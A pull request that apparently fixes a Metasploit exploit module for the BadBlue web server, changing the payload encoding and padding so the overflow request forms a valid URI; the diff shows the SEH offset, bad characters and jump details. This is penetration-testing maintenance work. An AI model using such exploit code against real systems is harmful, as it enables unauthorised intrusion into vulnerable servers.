### PR TITLE
Change to generate a valid URI

### DIFF
--- a/modules/exploits/windows/http/badblue_passthru.rb
+++ b/modules/exploits/windows/http/badblue_passthru.rb
@@ -42,7 +42,7 @@ class Metasploit3 < Msf::Exploit::Remote
 					'Space'    => 750,
 					'BadChars' => "\x00\x0a\x0b\x0d\x20\x23\x25\x26\x2b\x2f\x3a\x3c\x3d\x3f\x5c",
 					'StackAdjustment' => -3500,
-					#'EncoderType'   => Msf::Encoder::Type::AlphanumUpper,
+					'EncoderType'   => Msf::Encoder::Type::AlphanumUpper,
 					'DisableNops'	=>  'True',
 				},
 			'Platform'       => 'win',
@@ -59,7 +59,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	def exploit
 		seh_offset = 4116
 		#sploit = Rex::Text.pattern_create(seh_offset)
-		sploit = rand_text(seh_offset)
+		sploit = rand_text_alpha(seh_offset)
 		# Need to jump over the nul byte
 		seh = Rex::Arch::X86.jmp_short(8) + rand_text(2) + [target.ret].pack('V')
 		sploit << seh


### PR DESCRIPTION
The rand_text function and the commenting out of the encoder means that invalid URI data is written when this module is sent. I changed that to be all alphanumeric characters
